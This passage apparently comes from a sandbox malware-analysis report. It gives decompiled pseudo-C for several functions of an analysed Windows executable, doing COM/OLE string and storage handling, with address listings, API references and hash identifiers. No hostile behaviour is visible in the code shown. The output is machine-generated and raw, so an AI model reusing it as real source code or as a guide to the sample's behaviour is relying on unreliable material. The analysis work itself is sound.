					if( *((intOrPtr*)(_t66 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E0040DE71(_t74, _t103 - 0x7c, _t98, _t101, _t111))), _t66);
						E00402C55( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
					_t74 =  *((intOrPtr*)(_t74 + 0x18));
					_t113 =  *((intOrPtr*)(_t74 - 0xc));
					if( *((intOrPtr*)(_t74 - 0xc)) != 0) {
						 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E0040DE71(_t74, _t103 - 0x7c, _t98, _t101, _t113))), _t74);
						E00402C55( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				 *((intOrPtr*)(_t101 + 8)) =  *_t98( *((intOrPtr*)(E0040DE71(_t74, _t103 - 0x7c, _t98, _t101, _t113))),  *((intOrPtr*)(_t103 - 0x80)));
				_t52 = E00402C55( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				_t114 =  *((intOrPtr*)(_t101 + 4));
				if( *((intOrPtr*)(_t101 + 4)) == 0) {
					 *((intOrPtr*)(_t101 + 4)) =  *_t98( *((intOrPtr*)(E0040DE71(0, _t103 - 0x7c, _t98, _t101, _t114))),  *((intOrPtr*)(E0040706D(0, _t98, _t101, _t114) + 0x10)));
					_t52 = E00402C55( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
				}
				if( *((intOrPtr*)(_t101 + 0xc)) == 0) {
					_t117 =  *((intOrPtr*)(_t101 + 0x10));
					if( *((intOrPtr*)(_t101 + 0x10)) != 0) {
						 *((intOrPtr*)(_t101 + 0xc)) =  *_t98( *((intOrPtr*)(E0040DE71(0, _t103 - 0x7c, _t98, _t101, _t117))),  *((intOrPtr*)( *((intOrPtr*)(E0040706D(0, _t98, _t101, _t117) + 4)) + 0x64)));
						_t52 = E00402C55( *((intOrPtr*)(_t103 - 0x7c)) + 0xfffffff0, _t96);
					}
				}
				_pop(_t99);
				_pop(_t102);
				_pop(_t76);
				return E0041D773(_t52, _t76,  *(_t103 + 0x88) ^ _t103, _t96, _t99, _t102);
			}






















                                                                                                                            0x0041b114
                                                                                                                            0x0041b115
                                                                                                                            0x0041b122
                                                                                                                            0x0041b129
                                                                                                                            0x0041b130
                                                                                                                            0x0041b137
                                                                                                                            0x0041b13d
                                                                                                                            0x0041b143
                                                                                                                            0x0041b155
                                                                                                                            0x0041b158
                                                                                                                            0x0041b15f
                                                                                                                            0x0041b165
                                                                                                                            0x0041b1d1
                                                                                                                            0x0041b1d6
                                                                                                                            0x0041b1d8
                                                                                                                            0x0041b1e0
                                                                                                                            0x0041b1e1
                                                                                                                            0x0041b1f4
                                                                                                                            0x0041b1f9
                                                                                                                            0x0041b1fe
                                                                                                                            0x0041b1e3
                                                                                                                            0x0041b1e3
                                                                                                                            0x0041b1e8
                                                                                                                            0x0041b1ed
                                                                                                                            0x0041b1ed
                                                                                                                            0x0041b167
                                                                                                                            0x0041b16a
                                                                                                                            0x0041b171
                                                                                                                            0x0041b177
                                                                                                                            0x0041b17d
                                                                                                                            0x0041b180
                                                                                                                            0x0041b183
                                                                                                                            0x0041b187
                                                                                                                            0x0041b19c
                                                                                                                            0x0041b19f
                                                                                                                            0x0041b19f
                                                                                                                            0x0041b1a4
                                                                                                                            0x0041b1a7
                                                                                                                            0x0041b1ab
                                                                                                                            0x0041b1c0
                                                                                                                            0x0041b1c3
                                                                                                                            0x0041b1c3
                                                                                                                            0x0041b1ab
                                                                                                                            0x0041b218
                                                                                                                            0x0041b21b
                                                                                                                            0x0041b222
                                                                                                                            0x0041b225
                                                                                                                            0x0041b241
                                                                                                                            0x0041b244
                                                                                                                            0x0041b244
                                                                                                                            0x0041b24c
                                                                                                                            0x0041b24e
                                                                                                                            0x0041b251
                                                                                                                            0x0041b270
                                                                                                                            0x0041b273
                                                                                                                            0x0041b273
                                                                                                                            0x0041b251
                                                                                                                            0x0041b27e
                                                                                                                            0x0041b27f
                                                                                                                            0x0041b282
                                                                                                                            0x0041b28f

                                                                                                                            APIs
                                                                                                                            • _memset.LIBCMT ref: 0041B143
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0041B194
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0041B1B8
                                                                                                                              • Part of subcall function 0040DE71: __EH_prolog3.LIBCMT ref: 0040DE78
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0041B210
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0041B239
                                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 0041B268
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: AllocString$H_prolog3_memset
                                                                                                                            • String ID: @LC
                                                                                                                            • API String ID: 842698744-1019364593
                                                                                                                            • Opcode ID: 440f50da48d59a2ccd7c7c1512750235cd6b610541f6f8e5118c038f903ad2ee
                                                                                                                            • Instruction ID: b233a2861034ef499a7d8398eccb2820ec81b6628bcc4521bd1cbfa93589d3e6
                                                                                                                            • Opcode Fuzzy Hash: 440f50da48d59a2ccd7c7c1512750235cd6b610541f6f8e5118c038f903ad2ee
                                                                                                                            • Instruction Fuzzy Hash: 994162709006049FCB34AF79C895A9EB7B0EF14314F10856FE465AB2D2DB789448CF58
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00415E2A Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 54COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 97%
                                                                                                                            			E00415E2A(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				short* _t48;
				intOrPtr _t55;
				void* _t56;
				void* _t59;

				_t59 = __eflags;
				_push(4);
				E0041E981(E00431BFE, __ebx, __edi, __esi);
				_t55 = __ecx;
				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
				E004054D5(__ecx, _t59);
				 *(__ecx + 0x2c) =  *(__ecx + 0x2c) | 0xffffffff;
				 *((intOrPtr*)(_t56 - 4)) = 0;
				 *((intOrPtr*)(__ecx)) = 0x435324;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t56 + 8));
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x50)) = 0;
				 *((intOrPtr*)(__ecx + 0x54)) = 0;
				 *((intOrPtr*)(__ecx + 0x58)) = 0;
				 *((intOrPtr*)(__ecx + 0x5c)) = 0;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((intOrPtr*)(__ecx + 0x74)) = 0;
				 *((intOrPtr*)(__ecx + 0x88)) = 0;
				 *((intOrPtr*)(__ecx + 0x8c)) = 0;
				 *((intOrPtr*)(__ecx + 0x90)) = 0;
				 *((intOrPtr*)(__ecx + 0x94)) = 0;
				 *((intOrPtr*)(__ecx + 0x98)) = 0;
				 *((intOrPtr*)(__ecx + 0x9c)) = 0;
				 *((intOrPtr*)(__ecx + 0xa0)) = 0;
				E004033D9(__ecx + 0xa4);
				 *((char*)(_t56 - 4)) = 1;
				 *((intOrPtr*)(_t55 + 0xa8)) = 0;
				E0041B791(_t55 + 0xbc);
				 *((intOrPtr*)(_t55 + 0xc4)) = 0;
				 *((intOrPtr*)(_t55 + 0xc8)) = 0x435178;
				 *((intOrPtr*)(_t55 + 0xcc)) = 0x4352a4;
				 *((intOrPtr*)(_t55 + 0xd0)) = 0x4351a0;
				 *((intOrPtr*)(_t55 + 0xd4)) = 0x4351cc;
				 *((intOrPtr*)(_t55 + 0xd8)) = 0x4351ec;
				 *((intOrPtr*)(_t55 + 0xdc)) = 0x435204;
				 *((intOrPtr*)(_t55 + 0xe0)) = 0x435224;
				_t48 = _t55 + 0xac;
				 *((intOrPtr*)(_t55 + 0xe4)) = 0x435238;
				 *((intOrPtr*)(_t55 + 0xe8)) = 0x435264;
				E0041EC90(0, _t48, 0, 0x10);
				 *_t48 = 0;
				return E0041EA59(_t55);
			}







                                                                                                                            0x00415e2a
                                                                                                                            0x00415e2a
                                                                                                                            0x00415e31
                                                                                                                            0x00415e36
                                                                                                                            0x00415e38
                                                                                                                            0x00415e3b
                                                                                                                            0x00415e43
                                                                                                                            0x00415e4f
                                                                                                                            0x00415e52
                                                                                                                            0x00415e58
                                                                                                                            0x00415e5b
                                                                                                                            0x00415e5e
                                                                                                                            0x00415e61
                                                                                                                            0x00415e64
                                                                                                                            0x00415e67
                                                                                                                            0x00415e6a
                                                                                                                            0x00415e6d
                                                                                                                            0x00415e70
                                                                                                                            0x00415e73
                                                                                                                            0x00415e76
                                                                                                                            0x00415e7c
                                                                                                                            0x00415e82
                                                                                                                            0x00415e88
                                                                                                                            0x00415e8e
                                                                                                                            0x00415e94
                                                                                                                            0x00415e9a
                                                                                                                            0x00415ea0
                                                                                                                            0x00415eab
                                                                                                                            0x00415eaf
                                                                                                                            0x00415eb5
                                                                                                                            0x00415eba
                                                                                                                            0x00415ec0
                                                                                                                            0x00415eca
                                                                                                                            0x00415ed4
                                                                                                                            0x00415ede
                                                                                                                            0x00415ee8
                                                                                                                            0x00415ef2
                                                                                                                            0x00415efe
                                                                                                                            0x00415f08
                                                                                                                            0x00415f0f
                                                                                                                            0x00415f1a
                                                                                                                            0x00415f24
                                                                                                                            0x00415f2c
                                                                                                                            0x00415f36

                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: H_prolog3_memset
                                                                                                                            • String ID: $RC$8RC$dRC$xQC$QC
                                                                                                                            • API String ID: 2828583354-3195633353
                                                                                                                            • Opcode ID: db82e97974fe6dfe7fa63b8186debba408db55c7b2bb0debc43835a479214d18
                                                                                                                            • Instruction ID: 084f16be9cd39b845981c587acbc2decffc0c247568304fbe8e967509ee0d256
                                                                                                                            • Opcode Fuzzy Hash: db82e97974fe6dfe7fa63b8186debba408db55c7b2bb0debc43835a479214d18
                                                                                                                            • Instruction Fuzzy Hash: 593193B0801F408AD720DF2AC44578BFBE4BFA5318F109A0FD5EA9B661C7B46144CF59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004126D4 Relevance: 12.3, APIs: 8, Instructions: 297memoryCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 71%
                                                                                                                            			E004126D4(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t114;
				intOrPtr _t118;
				intOrPtr* _t119;
				void* _t120;
				intOrPtr* _t121;
				void* _t122;
				intOrPtr* _t125;
				intOrPtr* _t127;
				void _t129;
				intOrPtr* _t131;
				long _t134;
				void* _t135;
				void* _t136;
				void* _t137;
				void _t139;
				void _t141;
				void* _t143;
				void* _t144;
				void* _t147;
				void* _t148;
				void _t149;
				void* _t151;
				intOrPtr* _t153;
				void* _t154;
				void _t158;
				void* _t159;
				void _t161;
				intOrPtr* _t163;
				void* _t168;
				intOrPtr* _t170;
				intOrPtr* _t172;
				intOrPtr* _t174;
				void* _t175;
				intOrPtr _t186;
				intOrPtr* _t206;
				void* _t210;
				intOrPtr* _t219;
				intOrPtr* _t221;
				void* _t222;
				void* _t224;

				_push(0x68);
				_t114 = E0041E981(E00431A4A, __ebx, __edi, __esi);
				_t221 = __ecx;
				 *((intOrPtr*)(_t224 - 0x24)) = __ecx;
				_t219 = __ecx + 0x50;
				 *(_t224 - 0x10) = 0;
				if( *_t219 != 0) {
					L2:
					 *(_t224 + 8) = 0;
					 *(_t224 - 0x14) = 0;
					 *((intOrPtr*)(_t224 + 0x14)) = 0;
					E00410F79(_t221, _t221 + 0x40);
					_t118 =  *((intOrPtr*)( *_t221 + 0xc0))();
					 *((intOrPtr*)(_t224 - 0x20)) = _t118;
					if(_t118 != 0) {
						L5:
						_t222 =  *(_t224 + 0xc);
						if(_t222 == 0) {
							__eflags =  *(_t224 + 0x10);
							if( *(_t224 + 0x10) != 0) {
								L16:
								_t119 =  *_t219;
								_t210 = _t224 - 0x14;
								_t120 =  *((intOrPtr*)( *_t119))(_t119, 0x437b8c, _t210);
								__eflags = _t120;
								if(_t120 < 0) {
									L43:
									if( *(_t224 - 0x10) >= 0) {
										L46:
										_t121 =  *((intOrPtr*)(_t224 + 0x14));
										if(_t121 != 0) {
											 *((intOrPtr*)( *_t121 + 8))(_t121);
										}
										if( *((intOrPtr*)(_t224 - 0x20)) != 0 &&  *(_t224 - 0x10) >= 0) {
											 *(_t224 - 0x10) = 1;
										}
										_t122 =  *(_t224 - 0x10);
										L52:
										return E0041EA59(_t122);
									}
									L44:
									_t125 =  *_t219;
									if(_t125 != 0) {
										 *((intOrPtr*)( *_t125 + 0x18))(_t125, 1);
										_t127 =  *_t219;
										 *((intOrPtr*)( *_t127 + 8))(_t127);
										 *_t219 = 0;
									}
									goto L46;
								}
								__eflags = _t222;
								if(_t222 != 0) {
									__eflags =  *(_t224 + 0x10);
									if( *(_t224 + 0x10) == 0) {
										 *(_t224 - 0x10) = 0x8000ffff;
										L37:
										_t129 =  *(_t224 - 0x14);
										L38:
										 *((intOrPtr*)( *_t129 + 8))(_t129);
										L39:
										if( *(_t224 - 0x10) < 0) {
											goto L44;
										}
										if( *((intOrPtr*)(_t224 - 0x20)) == 0) {
											_t186 =  *((intOrPtr*)(_t224 - 0x24));
											if(( *(_t186 + 0x70) & 0x00020000) == 0) {
												_t131 =  *_t219;
												 *(_t224 - 0x10) =  *((intOrPtr*)( *_t131 + 0xc))(_t131, _t186 + 0xc8);
											}
										}
										goto L43;
									}
									_t134 =  *((intOrPtr*)( *_t222 + 0x30))();
									__eflags = _t210;
									 *(_t224 - 0x2c) = _t134;
									if(__eflags > 0) {
										L29:
										 *(_t224 - 0x10) = 0x8007000e;
										 *(_t224 + 0x10) = 0;
										L30:
										__eflags =  *(_t224 + 0x10);
										 *(_t224 - 0x1c) = 0;
										if( *(_t224 + 0x10) == 0) {
											goto L37;
										}
										_t135 = _t224 - 0x1c;
										__imp__CreateILockBytesOnHGlobal( *(_t224 + 0x10), 1, _t135);
										__eflags = _t135;
										 *(_t224 - 0x10) = _t135;
										if(_t135 < 0) {
											goto L37;
										}
										_t136 = _t224 - 0x18;
										 *(_t224 - 0x18) = 0;
										__imp__StgOpenStorageOnILockBytes( *(_t224 - 0x1c), 0, 0x12, 0, 0, _t136);
										__eflags = _t136;
										 *(_t224 - 0x10) = _t136;
										if(_t136 >= 0) {
											_t139 =  *(_t224 - 0x14);
											 *(_t224 - 0x10) =  *((intOrPtr*)( *_t139 + 0x18))(_t139,  *(_t224 - 0x18));
											_t141 =  *(_t224 - 0x18);
											 *((intOrPtr*)( *_t141 + 8))(_t141);
										}
										_t137 =  *(_t224 - 0x1c);
										L35:
										 *((intOrPtr*)( *_t137 + 8))(_t137);
										goto L37;
									}
									if(__eflags < 0) {
										L26:
										_t143 = GlobalAlloc(0, _t134);
										__eflags = _t143;
										 *(_t224 + 0x10) = _t143;
										if(_t143 == 0) {
											goto L29;
										}
										_t144 = GlobalLock(_t143);
										__eflags = _t144;
										if(_t144 == 0) {
											goto L29;
										}
										 *((intOrPtr*)( *_t222 + 0x34))(_t144,  *(_t224 - 0x2c));
										GlobalUnlock( *(_t224 + 0x10));
										goto L30;
									}
									__eflags = _t134 - 0xffffffff;
									if(_t134 >= 0xffffffff) {
										goto L29;
									}
									goto L26;
								}
								_t147 = _t224 + 0xc;
								 *(_t224 + 0xc) = 0;
								__imp__CreateILockBytesOnHGlobal(0, 1, _t147);
								__eflags = _t147;
								 *(_t224 - 0x10) = _t147;
								if(_t147 < 0) {
									goto L37;
								}
								_t148 = _t224 + 0x10;
								 *(_t224 + 0x10) = 0;
								__imp__StgCreateDocfileOnILockBytes( *(_t224 + 0xc), 0x1012, 0, _t148);
								__eflags = _t148;
								 *(_t224 - 0x10) = _t148;
								if(_t148 >= 0) {
									_t149 =  *(_t224 - 0x14);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t149 + 0x14))(_t149,  *(_t224 + 0x10));
									_t151 =  *(_t224 + 0x10);
									 *((intOrPtr*)( *_t151 + 8))(_t151);
								}
								_t137 =  *(_t224 + 0xc);
								goto L35;
							}
							L11:
							_t153 =  *_t219;
							_t213 = _t224 + 8;
							_t154 =  *((intOrPtr*)( *_t153))(_t153, 0x437c3c, _t224 + 8);
							__eflags = _t154;
							if(_t154 < 0) {
								goto L16;
							} else {
								__eflags = _t222;
								if(__eflags != 0) {
									E0040F58B(0, _t224 - 0x74, _t213, _t219, _t222, __eflags);
									 *(_t224 - 4) = 0;
									E0041C12A(_t224 - 0x2c, _t224 - 0x74);
									_t158 =  *(_t224 + 8);
									_t159 =  *((intOrPtr*)( *_t158 + 0x14))(_t158, _t224 - 0x2c, _t222, 1, 0x1000, 0);
									_t47 = _t224 - 4;
									 *_t47 =  *(_t224 - 4) | 0xffffffff;
									__eflags =  *_t47;
									 *(_t224 - 0x10) = _t159;
									E0040F54D(0, _t224 - 0x74, _t224 - 0x2c, _t219, _t222,  *_t47);
								} else {
									_t161 =  *(_t224 + 8);
									 *(_t224 - 0x10) =  *((intOrPtr*)( *_t161 + 0x20))(_t161);
								}
								_t129 =  *(_t224 + 8);
								goto L38;
							}
						}
						if( *(_t224 + 0x10) != 0) {
							goto L16;
						}
						_t163 =  *_t219;
						_push(_t224 + 0x14);
						_push(0x437c4c);
						_push(_t163);
						if( *((intOrPtr*)( *_t163))() < 0) {
							goto L11;
						}
						_push(0);
						_push(0);
						_push(0);
						_push(3);
						if( *((intOrPtr*)( *_t222 + 0x50))() == 0) {
							goto L11;
						} else {
							 *(_t224 + 0x10) = 0;
							_t168 =  *((intOrPtr*)( *_t222 + 0x50))(0, 0xffffffff, _t224 + 0x10, _t224 + 0xc);
							_t206 =  *((intOrPtr*)(_t224 + 0x14));
							 *(_t224 - 0x10) =  *((intOrPtr*)( *_t206 + 0x14))(_t206,  *(_t224 + 0x10), _t168);
							_t170 =  *((intOrPtr*)(_t224 + 0x14));
							 *((intOrPtr*)( *_t170 + 8))(_t170);
							 *((intOrPtr*)(_t224 + 0x14)) = 0;
							goto L39;
						}
					}
					_t172 =  *_t219;
					 *((intOrPtr*)( *_t172 + 0x58))(_t172, 1, _t221 + 0x70);
					if(( *(_t221 + 0x70) & 0x00020000) == 0) {
						goto L5;
					}
					_t174 =  *_t219;
					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
					 *(_t224 - 0x10) = _t175;
					if(_t175 < 0) {
						goto L44;
					}
					goto L5;
				}
				_t122 = E00410D80(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x437b3c, _t219,  *((intOrPtr*)(_t224 + 0x14)));
				 *(_t224 - 0x10) = _t122;
				if(_t122 < 0) {
					goto L52;
				}
				goto L2;
			}











































                                                                                                                            0x004126d4
                                                                                                                            0x004126db
                                                                                                                            0x004126e0
                                                                                                                            0x004126e2
                                                                                                                            0x004126e7
                                                                                                                            0x004126ec
                                                                                                                            0x004126ef
                                                                                                                            0x00412710
                                                                                                                            0x00412716
                                                                                                                            0x00412719
                                                                                                                            0x0041271c
                                                                                                                            0x0041271f
                                                                                                                            0x00412728
                                                                                                                            0x00412730
                                                                                                                            0x00412733
                                                                                                                            0x00412766
                                                                                                                            0x00412766
                                                                                                                            0x0041276b
                                                                                                                            0x004127d0
                                                                                                                            0x004127d3
                                                                                                                            0x0041283f
                                                                                                                            0x0041283f
                                                                                                                            0x00412843
                                                                                                                            0x0041284d
                                                                                                                            0x0041284f
                                                                                                                            0x00412851
                                                                                                                            0x004129a0
                                                                                                                            0x004129a3
                                                                                                                            0x004129bd
                                                                                                                            0x004129bd
                                                                                                                            0x004129c2
                                                                                                                            0x004129c7
                                                                                                                            0x004129c7
                                                                                                                            0x004129cd
                                                                                                                            0x004129d4
                                                                                                                            0x004129d4
                                                                                                                            0x004129db
                                                                                                                            0x004129de
                                                                                                                            0x004129e3
                                                                                                                            0x004129e3
                                                                                                                            0x004129a5
                                                                                                                            0x004129a5
                                                                                                                            0x004129a9
                                                                                                                            0x004129b0
                                                                                                                            0x004129b3
                                                                                                                            0x004129b8
                                                                                                                            0x004129bb
                                                                                                                            0x004129bb
                                                                                                                            0x00000000
                                                                                                                            0x004129a9
                                                                                                                            0x00412857
                                                                                                                            0x00412859
                                                                                                                            0x004128b3
                                                                                                                            0x004128b6
                                                                                                                            0x00412968
                                                                                                                            0x0041296f
                                                                                                                            0x0041296f
                                                                                                                            0x00412972
                                                                                                                            0x00412975
                                                                                                                            0x00412978
                                                                                                                            0x0041297b
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00412980
                                                                                                                            0x00412982
                                                                                                                            0x0041298c
                                                                                                                            0x0041298e
                                                                                                                            0x0041299d
                                                                                                                            0x0041299d
                                                                                                                            0x0041298c
                                                                                                                            0x00000000
                                                                                                                            0x00412980
                                                                                                                            0x004128c0
                                                                                                                            0x004128c3
                                                                                                                            0x004128c5
                                                                                                                            0x004128c8
                                                                                                                            0x00412901
                                                                                                                            0x00412901
                                                                                                                            0x00412908
                                                                                                                            0x0041290b
                                                                                                                            0x0041290b
                                                                                                                            0x0041290e
                                                                                                                            0x00412911
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00412913
                                                                                                                            0x0041291c
                                                                                                                            0x00412922
                                                                                                                            0x00412924
                                                                                                                            0x00412927
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00412929
                                                                                                                            0x00412935
                                                                                                                            0x00412938
                                                                                                                            0x0041293e
                                                                                                                            0x00412940
                                                                                                                            0x00412943
                                                                                                                            0x00412945
                                                                                                                            0x00412951
                                                                                                                            0x00412954
                                                                                                                            0x0041295a
                                                                                                                            0x0041295a
                                                                                                                            0x0041295d
                                                                                                                            0x00412960
                                                                                                                            0x00412963
                                                                                                                            0x00000000
                                                                                                                            0x00412963
                                                                                                                            0x004128ca
                                                                                                                            0x004128d1
                                                                                                                            0x004128d3
                                                                                                                            0x004128d9
                                                                                                                            0x004128db
                                                                                                                            0x004128de
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004128e1
                                                                                                                            0x004128e7
                                                                                                                            0x004128e9
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004128f3
                                                                                                                            0x004128f9
                                                                                                                            0x00000000
                                                                                                                            0x004128f9
                                                                                                                            0x004128cc
                                                                                                                            0x004128cf
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004128cf
                                                                                                                            0x0041285b
                                                                                                                            0x00412862
                                                                                                                            0x00412865
                                                                                                                            0x0041286b
                                                                                                                            0x0041286d
                                                                                                                            0x00412870
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00412876
                                                                                                                            0x00412883
                                                                                                                            0x00412886
                                                                                                                            0x0041288c
                                                                                                                            0x0041288e
                                                                                                                            0x00412891
                                                                                                                            0x00412893
                                                                                                                            0x0041289f
                                                                                                                            0x004128a2
                                                                                                                            0x004128a8
                                                                                                                            0x004128a8
                                                                                                                            0x004128ab
                                                                                                                            0x00000000
                                                                                                                            0x004128ab
                                                                                                                            0x004127d5
                                                                                                                            0x004127d5
                                                                                                                            0x004127d9
                                                                                                                            0x004127e3
                                                                                                                            0x004127e5
                                                                                                                            0x004127e7
                                                                                                                            0x00000000
                                                                                                                            0x004127e9
                                                                                                                            0x004127e9
                                                                                                                            0x004127eb
                                                                                                                            0x00412807
                                                                                                                            0x00412813
                                                                                                                            0x00412816
                                                                                                                            0x0041281b
                                                                                                                            0x00412825
                                                                                                                            0x00412828
                                                                                                                            0x00412828
                                                                                                                            0x00412828
                                                                                                                            0x0041282f
                                                                                                                            0x00412832
                                                                                                                            0x004127ed
                                                                                                                            0x004127ed
                                                                                                                            0x004127f6
                                                                                                                            0x004127f6
                                                                                                                            0x00412837
                                                                                                                            0x00000000
                                                                                                                            0x00412837
                                                                                                                            0x004127e7
                                                                                                                            0x00412770
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00412776
                                                                                                                            0x0041277d
                                                                                                                            0x0041277e
                                                                                                                            0x00412783
                                                                                                                            0x00412788
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041278c
                                                                                                                            0x0041278d
                                                                                                                            0x0041278e
                                                                                                                            0x0041278f
                                                                                                                            0x00412798
                                                                                                                            0x00000000
                                                                                                                            0x0041279a
                                                                                                                            0x004127a9
                                                                                                                            0x004127ac
                                                                                                                            0x004127af
                                                                                                                            0x004127bc
                                                                                                                            0x004127bf
                                                                                                                            0x004127c5
                                                                                                                            0x004127c8
                                                                                                                            0x00000000
                                                                                                                            0x004127c8
                                                                                                                            0x00412798
                                                                                                                            0x00412735
                                                                                                                            0x00412740
                                                                                                                            0x0041274a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0041274c
                                                                                                                            0x00412758
                                                                                                                            0x0041275d
                                                                                                                            0x00412760
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00412760
                                                                                                                            0x00412700
                                                                                                                            0x00412707
                                                                                                                            0x0041270a
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • __EH_prolog3.LIBCMT ref: 004126DB
                                                                                                                              • Part of subcall function 00410D80: SysStringLen.OLEAUT32(?), ref: 00410D88
                                                                                                                              • Part of subcall function 00410D80: CoGetClassObject.OLE32(?,?,00000000,00437BBC,?), ref: 00410DA6
                                                                                                                            • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00412865
                                                                                                                            • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00412886
                                                                                                                            • GlobalAlloc.KERNEL32(00000000,00000000), ref: 004128D3
                                                                                                                            • GlobalLock.KERNEL32 ref: 004128E1
                                                                                                                            • GlobalUnlock.KERNEL32(?), ref: 004128F9
                                                                                                                            • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 0041291C
                                                                                                                            • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00412938
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 0000000E.00000002.312649784.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 0000000E.00000002.311824805.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.320555608.0000000000433000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322114098.0000000000440000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322663455.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            • Associated: 0000000E.00000002.322977307.0000000000447000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_14_2_400000_62829251169ea_9dc91d.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 317715441-0
                                                                                                                            • Opcode ID: 3d3060fb26535642c13925da711d5ad474a37dc8069eb91f89b5668fafdf6279
                                                                                                                            • Instruction ID: 3b31c927bd086c34e27da083c4e95bbcc0ce30a7034f4d4115a43c4efd3c7f34
